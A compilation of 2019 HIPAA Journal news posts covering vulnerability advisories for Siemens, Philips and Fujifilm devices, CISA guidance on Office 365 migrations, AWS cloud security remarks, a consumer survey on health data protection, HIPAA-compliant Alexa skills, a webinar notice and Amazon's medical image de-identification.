Healthcare Technology Vendor News

Vulnerabilities Identified in Siemens Sinamics Perfect Harmony Drives and Scalance Access Points

Siemens has discovered several high-severity vulnerabilities and one critical vulnerability in the Scalance W1750D direct access point. The vulnerabilities can be exploited remotely and require a low level of skill to exploit.

If exploited, an attacker could gain access to the W1750D device and execute arbitrary code within its underlying operating system, gain access to sensitive information, perform administrative actions on the device, and expose session cookies for an administrative session.

The vulnerabilities are present in all versions prior to 8.4.0.1

CVE-2018-7084 is a critical command injection vulnerability in the web interface that could allow arbitrary system commands to be performed within the underlying operating system. If exploited, files could be copied, the configuration could be read, the device could be rebooted, and files could be written or deleted.  The vulnerability has been assigned a CVSSv3 base score of 9.8 out of 10.

CVE-2019-7083 is a high-severity information exposure vulnerability that could allow an attacker to access core dumps of previously crashed processes via the web interface of the device. The vulnerability has been assigned a CVSSv3 base score of 7.5 out of 10.

CVE-2019-16417 is a high-severity information exposure vulnerability that could allow an attacker to access recently cached configuration commands by sending a specially crafted URL to the web interface. The vulnerability has been assigned a CVSSv3 base score of 7.5 out of 10.

CVE-2019-7082 is a high-severity command injection vulnerability that could allow an authenticated administrative user to execute arbitrary commands on the underlying operating system. The vulnerability has been assigned a CVSSv3 base score of 7.2 out of 10.

CVE-2019-7064 is a medium-severity cross-site scripting vulnerability that could allow an attacker to perform administrative actions on a vulnerable device or expose admin session cookies by tricking an administrator into clicking a malicious hyperlink. The vulnerability has been assigned a CVSSv3 base score of 6.4 out of 10.

Siemens has fixed all flaws in version 8.4.0.1 and advises users to upgrade the operating system as soon as possible to correct the flaws.

If the update cannot be applied, the following workarounds will reduce the risk of the vulnerabilities being exploited:

  • Restrict access to the web-based management interface to the internal or VPN network.
  • Do not browse other websites and do not click on external links while being authenticated to the administrative web interface.
  • Apply appropriate strategies for mitigation.

Siemens Sinamics Perfect Harmony GH180 Fieldbus Network Vulnerability

A high-severity vulnerability has been identified in the Siemens Sinamics Perfect Harmony GH180 Fieldbus Network. ). The flaw is remotely exploitable, requires a low level of skill to exploit, and requires no privileges or user interaction.

The flaw is present in the follow medium voltage converters

  • Siemens Sinamics Perfect Harmony GH180 with NXG I control and GH180 with NXG II control: MLFBs: 6SR2. . . -, 6SR3. . . -, 6SR4. . . -: The flaw affects all versions with option G21, G22, G23, G26, G28, G31, G32, G38, G43 or G46

The flaw concerns improper input validation and could be exploited to trigger a denial-of-service condition by sending specially crafted packets to the device, causing the device to restart, which would compromise the availability of the affected system. Network access to the device would be required to exploit the vulnerability.

The vulnerability – CVE-2019-6574 – has been assigned a CVSSv3 base score of 7.5 out of 10.

To correct the flaw, users should upgrade to NXGpro control. If the upgrade is not possible, the following workaround has been suggested:

  • Disable the fieldbus parameter read/write functionality
  • Apply cell protection concept and implement defense in depth

Siemens Sinamics Perfect Harmony GH180 Drives NXG I and NXG II Vulnerability

A high-severity vulnerability has been identified in Siemens Sinamics Perfect Harmony GH180 Drives (NXG I and NXG II). The flaw is remotely exploitable, requires a low level of skill to exploit, and requires no privileges or user interaction.

If exploited, an individual with access to the Ethernet Modbus Interface could trigger a denial-of-service condition exceeding the number of available connections and compromise the availability of the affected system.

The vulnerability is present in all versions of GH180 with NXG I control and CH180 with NXG II control (MLFBs: 6SR2. . . -, 6SR3. . . -, 6SR4. . . -)

The vulnerability – CVE-2019-6578 – has been assigned a CVSSv3 base score of 7.5 out of 10.

To correct the flaw, users should upgrade to NXGpro control. If the upgrade is not possible, the following workaround has been suggested:

  • Install a protocol bridge that isolates the networks and eliminates direct connections to the Ethernet Modbus Interface.
  • Apply cell protection concept and implement defense in depth.

The post Vulnerabilities Identified in Siemens Sinamics Perfect Harmony Drives and Scalance Access Points appeared first on HIPAA Journal.

DHS Issues Security Best Practices to Mitigate Risks Associated with Office 365 Migrations

Body:

The DHS’ Cybersecurity and Infrastructure Security Agency (CISA) has issued a new analysis report highlighting some of the common risks and vulnerabilities associated with transitioning from on-premise mail services to cloud-based services such as Microsoft Office 365. The report details best practices to adopt to manage risks and prevent user and mailbox compromises.

Many healthcare organizations have realized the benefits of transitioning to cloud-based email services yet lack the in-house expertise to manage their migrations. Many have used third-party service providers to migrate their email services to Office 365. CISA notes that use of third parties to manage Office 365 migrations has led to an increase in security incidents.

Over the past 6 months, CISA has had several engagements with customers who have used third-party service providers to manage their migrations and discovered a range of different Office 365 configurations that lowered organization’s security posture and left them vulnerable to phishing and other cyberattacks.

CISA notes that the majority of those organizations didn’t have a dedicated IT security team that was focused on cloud security and, as a result, vulnerabilities went unnoticed. In some cases, the organization experienced mailbox compromises as a result of the risks and vulnerabilities introduced during Office 365 migrations.

According to the AR19-133A analysis report, some of the most common vulnerabilities that were identified which could easily lead to data breaches are:

The failure to implement multifactor authentication for Global Active Directory (AD) Global Administrators. Despite these accounts having the highest level of privileges at the tenant level, MFA is not enabled by default.

Disabled mailbox auditing – The failure to implement mailbox auditing means actions taken by mailbox owners, delegates, and administrators will not be logged. This will hamper investigations into mailbox activity and potential data breaches. Customers who implemented Office 365 prior to 2019 are required to explicitly enable mailbox auditing.

Enabled password syncing – With this setting enabled, the password from on-premises AD overwrites the password in Azure AD, which means that if a mailbox was compromised prior to migration to Office 365, when the sync occurs, an attacker would be able to move laterally to the cloud.

Authentication not supported by legacy protocols – Office 365 uses Azure AD for authentication with Exchange Online; however, several protocols (e.g. POP3, IMAP, and SMTP) used for authentication with Exchange Online do not support modern authentication mechanisms such as MFA. Without MFA, accounts will only be secured by a password, which will greatly increase the attack surface.

CISA suggests several best practices to adopt to ensure that migrating to Office 365 does not result in the lowering of an organization’s security posture:

  • Implement multi-factor authentication – It is the best mitigation technique to protect against credential theft via phishing attacks
  • Ensure audit logging is configured in the Security and Compliance Center
  • Ensure mailbox auditing is activated for each user
  • Ensure Azure AD is correctly configured prior to migrating users to Office 365
  • Ensure legacy email protocols are disabled or are limited to specific users

The post DHS Issues Security Best Practices to Mitigate Risks Associated with Office 365 Migrations appeared first on HIPAA Journal.

Vulnerability Identified in Philips Tasy EMR

A vulnerability has been identified in the Philips Tasy EMR information system. If exploited, an attacker could send unexpected information to the system which could potentially allow the execution of arbitrary code, alter information flow, affect system integrity, and could give the attacker unauthorized access to patient information.

The flaw was identified by security researcher Rafael Honorato who reported the vulnerability to Philips, which reported the flaw to the National Cybersecurity and Communications Integration Center. An advisory about the vulnerability was issued by ICS-CERT on April 30, 2019.

The vulnerability – CVE-2019-6562 – is present in Tasy EMR versions 3.02.174 and earlier, and mostly affects healthcare providers in Brazil and Mexico. The vulnerability has not been exploited in wild and no public exploits have been identified.

The cross-site scripting vulnerability is caused by improper neutralization of user-controllable input during web page generation. The vulnerability requires a low level of skill to exploit by an individual on the customer site or connecting via a VPN. Despite the potential for information exposure, the vulnerability has been assigned a CVSS v3 base score of 4.1 out of 10.

Philips has advised all users of Tasy EMR to update to the latest three versions of the software as soon as possible and to ensure Service Packs are applied promptly. Philips will be patching hosted solutions automatically and users who have installed Tasy EMR on-premise will receive alerts when new software versions are released.

Additionally, Philips recommends following the instructions in the product configuration manual and ensuring that Tasy EMR is only accessible over the internet via a VPN.

The post Vulnerability Identified in Philips Tasy EMR appeared first on HIPAA Journal.

Critical Vulnerability Identified in Fujifilm Computed Radiography Cassette Readers

Two vulnerabilities have been identified in Fujifilm computed radiography cassette readers. If exploited, an attacker could gain access to the operating system, execute arbitrary code, render the devices inoperable, alter functionality, and cause image loss.

The vulnerabilities are present in the following Fujifilm computed radiography cassette readers:

  • CR-IR 357 FCR Capsula X
  • CR-IR 357 FCR Carbon X
  • CR-IR 357 FCR XC-2

The most serious vulnerability – CVE-2019-10950 – is due to improper access controls on telnet services. A remote attacker with a relatively low level of skill could exploit the vulnerability to gain access to the operating system and remotely execute code and affect the functionality of the device. The vulnerability has been assigned a CVSS v3 base score of 9.8 out of 10.

The second vulnerability – CVE-2019-10948 – is due to uncontrolled resource consumption. An overflow of TCP packets could be caused in a denial of service (DoS) attack. If exploited, a DoS attack could render the device in operable and would require a reboot to restore functionality. The vulnerability has been assigned a CVSS v3 base score of 7.5.

The vulnerabilities were identified by Marc Ruef and Rocco Gagliardi of Scip AG.

To prevent exploitation of the vulnerabilities, users can configure the CR-IR-357 system with ‘Secure Host functionality.’ This configuration instructs the CR-IR-357 system to ignore network traffic other than from the IP address of the image acquisition console.

This mitigation will only be an option for users that have one image acquisition console using the CR-IR-357 Reader Unit. With this configuration activated, multiple image acquisition consoles cannot share the Reader Unit as network traffic will only be accepted from a single IP address. If Reader Unit sharing has been implemented, Fujifilm should be contacted for further information on other possible mitigations.

Users should also ensure that appropriate administrative and technical controls are implemented to prevent unauthorized devices and users from connecting to the network. Fujifilm also recommends segmenting the network or using a VLAN to segregate public traffic from the private network.

The post Critical Vulnerability Identified in Fujifilm Computed Radiography Cassette Readers appeared first on HIPAA Journal.

AWS Chief Technology Officer Allays Fears about Cloud Security and Talks about the Huge Potential of Alexa Voice Technology

Amazon Web Services’ chief technology officer, Werner Vogels, has been dispelling security myths about cloud computing at the Dublin Tech Summit in Ireland this week.

Concerns have been raised about the security of data stored in the cloud, especially following the discovery that 540 million Facebook records had been exposed on AWS: One of several high-profile data breaches that have involved AWS-stored data in the past 12 months.

Fears About Compliance and the Cloud

Companies required to comply with General Data Protection Regulation (GDPR) must ensure that the personal data of EU citizens is secured and kept private and confidential. Since GDPR came into effect on May 25, 2018, the potential penalties for data exposures have increased significantly. It is therefore understandable that companies are concerned about storing data in the cloud rather than on-premise infrastructure that they feel better able to secure.

Germany’s federal commissioner, Ulrich Kelber, spoke before Vogels at the Tech Summit and voiced his concerns about American cloud storage providers, stating that they should not be used for hosting police data as there was a risk of snooping. The federal commissioner was particularly concerned about the passing of the Cloud Act in 2018, which could allow federal law enforcement to gain access to data stored by U.S. technology companies.

Many companies in the United States are also wary about using the cloud for storing sensitive data such as protected health information, and the potential for HIPAA violations. As is the case with GDPR, the penalties for data exposure can be severe and, for small healthcare organizations, potentially catastrophic.

Vogels explained that cloud security should not be a concern and storing data on AWS is perfectly secure. His advice to all AWS users is “encrypt everything,” but at a minimum, make sure that all personally identifiable information is encrypted.

By encrypting data, companies can meet the requirements of GDPR, HIPAA, and other federal and state regulations. As for the Cloud Act, if a technology company is issued with a warrant to release data, if the AWS customer has encrypted their data using modern encryption standards, and only they hold the key to decrypt the data, it is perfectly secure. Any conversation about data access is then between law enforcement and the customer. AWS will not be involved.

Vogels also explained that AWS has improved its controls to make it harder for data to be exposed. All customer information is now closed off by default. It takes a deliberate action to remove AWS protections and leave data accessible. Should that happen, major red flags are raised.

Vogels said, “We’re very strong believers that the best way to help our customers protect themselves from whatever bad actors you can imagine is to ensure encryption is as easy to use as any other digital service.” Encryption is offered through AWS to make securing sensitive data as easy as possible.

Voice Technology Has Huge Potential

Vogels also spoke about one potential big area for Amazon. Big even by Amazon’s standards. Vogels said Amazon is not looking to invest in technologies that will add $100 million to the balance sheet. Amazon is looking for billion-dollar plus opportunities. Alexa voice technology is a prime example.

Amazon Alexa is the leading voice technology and has already found uses in healthcare. HIPAA was something of a stumbling block as the regulations covering protected health information are strict, but Amazon has recently solved that problem. Amazon is offering business associate agreements to a select group of companies and has made sure that its voice tech can transfer data securely in a manner compliant with HIPAA Rules. Last week Amazon announced that six new healthcare skills had been launched that could be used in connection with PHI. The company will be collaborating further with healthcare organizations, although by invite only at this stage.

Skills have also been developed by WebMD which allow users to ask questions about their symptoms using voice commands rather then entering information on a website. These skills are just the tip of the iceberg and the potential uses of voice technology in healthcare are huge. Alexa could even be used by people to gain access to healthcare information stored in their EHRs in the not too distant future.

Vogels certainly believes voice technology is the way forward and thinks voice commands will be the main way that people interact with digital systems in the future.

The post AWS Chief Technology Officer Allays Fears about Cloud Security and Talks about the Huge Potential of Alexa Voice Technology appeared first on HIPAA Journal.

Study Reveals How Well Consumers Feel Health Data is Protected

The results of a study on healthcare cybersecurity from the perspective of consumers has recently been published by cybersecurity firm Morphisec. More than 1,000 consumers were surveyed to obtain their opinions on healthcare cybersecurity, the healthcare threat landscape, how their personal health information is being targeted, and how well they feel their health information is protected.

The transition from paper records to electronic health records has improved efficiency and allows health information to be shared more easily, but vulnerabilities have been introduced that can be exploited by hackers.

Morphisec notes that cyberattacks on the healthcare industry occur at more than double the rate of attacks on other industry sectors. The volume of attacks and frequency that they are reported in the media undoubtedly affects how secure consumers believe their health records are.

Since 2009, more than 190 million healthcare records have been exposed or stolen, which is equivalent to 59% of the population of the United States, yet when consumers were asked if their providers have experienced a data breach, 54% did not know. 40% said no breach had occurred to their knowledge and only 6% said one of their providers has been affected. HIPAA requires notifications to be sent to consumers when their health records are exposed, but it would appear that many consumers feel they are not informed about data breaches.

Consumers Concerned About Privacy and Security of Health Data

When asked who is responsible for protecting health data, 51% of consumers felt it was a joint responsibly between consumers and their providers. Only 29% felt that it was the sole responsibility of their provider to keep health data private and confidential. Only 8% of consumers felt that it was their own responsibility to keep health that has been exchanged with them to be kept private.

As more and more healthcare providers give patients access to their health information through patient portals, and consumers are encouraged to obtain copies of their health data, it is not surprising that so many consumers feel the responsibility for protecting health data is shared. The use of patient portals has increased from 28% to 42% in the past 12 months – an increase of 14%.

55% of consumers feel their health data is more secure when stored by providers. 45% believe that health information stored on personal electronic devices is more secure than data held by their providers. It is unclear whether consumers do not trust their providers to secure data, whether they think a cyberattack on a provider is more likely than an attack on them personally, or if they feel that there is little difference between their own security defenses and those of their providers.

What is clear is consumers believe there are many weak links that need to be addressed, in particular web browser defenses, which almost a quarter of respondents (24.1%) felt was the weakest link in security. A fifth of respondents felt the weak point was endpoint defenses (21%), email phishing defenses (20.9%) or patient portal defenses (20.1%). Only 13.8% felt medical device security was the weakest link.

Healthcare Organizations Only Achieving a Baseline Level of Security

HIPAA requires healthcare organizations to implement security measures to keep protected health information private and confidential. Heavy fines can be issued if a data breach is experienced and providers are discovered to have failed to implement appropriate defenses. HIPAA has certainly helped to improve the standard of security across the healthcare industry as a whole, but many providers have only implemented security defenses to ensure compliance with HIPAA. Once the minimum standard of security has been achieved, the checkbox is ticked, and little is done to further reduce risk.

Through compliance, risk can be reduced, but HIPAA compliance does not mean cyberattacks will not succeed nor that attacks have been made difficult for hackers.

“With nearly 90% of health organization CIOs indicating they purchase cybersecurity software to comply with HIPAA, rather than to reduce threat risk, consumers have a right to be worried about the cyber defenses protecting their health data,” said Tom Bain, VP of Security Strategy at Morphisec. “Merely checking the box that cybersecurity defenses meet HIPAA requirements isn’t enough to protect healthcare organizations today from advanced and zero-day attacks from FIN6 and other sophisticated attackers.”

That sentiment has been echoed by many industry professionals who believe that the threat of financial penalties is stopping healthcare organizations from improving their defenses further. Many just achieve the minimum level of security to comply with HIPAA.

Several stakeholders have suggested a safe harbor should be established for healthcare providers who meet HIPAA security standards to ensure they are immune from financial penalties. With the threat of financial penalties gone, it is felt that healthcare organizations would be more likely to invest more heavily in cybersecurity defenses.

The post Study Reveals How Well Consumers Feel Health Data is Protected appeared first on HIPAA Journal.

Amazon Announces 6 New HIPAA Compliant Alexa Skills

Six new HIPAA compliant Alexa skills have been launched by Amazon that allow protected health information to be transmitted without violating HIPAA Rules.

The new HIPAA compliant Alexa skills were developed by six different companies that have participated in the Amazon Alexa healthcare program. The new skills allow patients to schedule appointments, find urgent care centers, receive updates from their care providers, receive their latest blood sugar reading, and check the status of their prescriptions.

This is not the first time that Alexa skills have been developed, but a stumbling block has been the requirements of the HIPAA Privacy Rule, which limit the use of voice technology with protected health information. Now, thanks to HIPAA compliant data transfers, the voice assistant can now be used by a select group of healthcare organizations to communicate PHI without violating the HIPAA Privacy Rule.

Amazon has stated that it plans to work with many other developers through an invite-only program to develop new skills to use within its HIPAA-eligible environment. Amazon is offering those organizations business associate agreements to meet HIPAA requirements. The initial roll-out has been limited to six new HIPAA compliant Alexa skills as detailed below:

New HIPAA Compliant Alexa Skills

The purpose of the new skills is to allow patients, caregivers, and health plan members to use Amazon Alexa to manage their healthcare at home through voice commands. The skills make it easier for patients to perform healthcare-related tasks, access their health data, and interact with their providers.

The six new HIPAA compliant Alexa skills are:

Express Scripts

Members of the Express Scripts pharmacy services organization can check the status of a home delivery prescription and can ask Alexa to send notifications when prescriptions have been shipped and when they arrive at their door.

Cigna Health Today

Employees who have been enrolled in a Cigna health plan can use this Alexa skill to check wellness program goals, receive health tips, and access further information on rewards.

My Children’s Enhanced Recovery After Surgery (ERAS)

Parents and caregivers of children enrolled in Boston Children’s Hospital’s ERAS program can send updates to their care teams on recovery progress. Care teams can also send information on post-op appointments and pre- and post-op guidance. Initially, the skill is being used in relation to cardiac surgery patients, although the program will be expanded in the near future.

Livongo Blood Sugar Lookup

Participants in Livongo’s Diabetes Program can query their latest blood sugar reading from their device, check blood sugar monitoring trends such as their weekly average reading, and receive personalized health tips through their Alexa device.

Atrium Health

Atrium Health’s new Alexa skill allows patients to find urgent care locations near them and schedule same-day appointments, find out about opening hours, and current waiting times. Initially the Alexa skill is being offered to customers in North and South Carolina.

Swedish Health Connect

Providence St. Joseph Health has created an Alexa skill that allows patients to find Swedish Express Care Clinics in their vicinity and schedule same day appointments at 37 of its locations on the west coast.

The post Amazon Announces 6 New HIPAA Compliant Alexa Skills appeared first on HIPAA Journal.

Webinar: April 4, 2019: Email Security, DMARC, and Sandboxing

The healthcare industry is particularly vulnerable to phishing attacks and successful attacks commonly result in significant data breaches. It is now something of a rarity for a week to pass without a healthcare phishing attack being reported.

While healthcare organizations are providing security awareness training to staff and are using email security solutions, those defenses are not always effective.

To improve understanding of why advanced attacks are managing to evade detection by traditional email security solutions, email security solution provider TitanHQ is hosting a webinar.

During the webinar TitanHQ will explain about the threat from phishing and how organizations can protect themselves and their customers/patients. The webinar will also explain how two new features of TitanHQ’s SpamTitan email security solution – DMARC authentication and sandboxing – can protect against advanced email threats, zero-day attacks, malware, phishing, and spoofing.

Webinar Details:

Date : Thursday, April 4th, 2019

Time: 12pm EST

Duration: 30 minutes

Sign up to the Webinar here.

Disclaimer

This is not a sponsored event.  HIPAA Journal has no business relationship with the event holder.  HIPAA Journal promotes events that might be of interest to its readers. You may submit your event information on our contact page. HIPAA Journal does not accept payment for promoting events.

The post Webinar: April 4, 2019: Email Security, DMARC, and Sandboxing appeared first on HIPAA Journal.

Amazon Launches New System for De-identifying Medical Images

Amazon has announced that it has developed a new system that allows identifying protected health information contained in medical images to be automatically removed to prevent patients from being identified from the images.

Medical images often have patients’ protected health information stored as text within the image, including the patient’s name, date of birth, age, and other metrics. Prior to the images being used for research, authorization must be obtained from the patient or all identifying data must be permanently removed.  Removing PHI from images requires a manual check and alteration of the image to redact the PHI and that can be an expensive and time-consuming process, especially when large number of images must be de-identified.

The new system uses Amazon’s Rekognition machine-learning service, which can detect and extract text from images. The text is then fed through Amazon Comprehend Medical to identify any PHI. In combination with Python code it is possible to quickly redact any PHI in the images. The system works on PNG, JPEG, and DICOM images.

A confidence score is provided by the service which indicates the level of confidence in the accuracy of the detected entity, which can form the basis of reviews to make sure that information has been correctly identified. The desired confidence level – from 0.00 to 1.00 – can be set by the user. A confidence level of 0.00 will see all text identified by the service be redacted.

Amazon says the system allows healthcare organizations to de-identify large numbers of images quickly and inexpensively. Amazon notes that the system can be used to batch process thousands or millions of images. Also, once an image has been processed and the location of PHI has been identified, it is possible to associate a Lambda function to automatically redact PHI from any new images when they are uploaded to an Amazon S3 bucket.

The post Amazon Launches New System for De-identifying Medical Images appeared first on HIPAA Journal.